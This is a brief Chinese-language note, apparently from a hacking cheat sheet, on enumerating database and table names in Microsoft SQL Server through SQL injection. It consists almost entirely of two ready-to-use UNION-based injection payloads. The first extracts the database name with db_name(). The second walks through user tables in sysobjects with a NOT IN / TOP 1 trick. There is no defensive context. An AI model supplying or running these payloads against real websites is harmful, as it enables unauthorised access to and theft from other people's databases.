MSSQL 分析表名

MSSQL下分析表名的方法：

1。先db_name()分析出数据库名
~and 1=2 union select db_name()

2。接着用以下语句分析表名(假设数据库名为dbname)
~and 1=2 union all select name from dbname..sysobjects WHERE xtype = 'U' AND name NOT IN(SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55)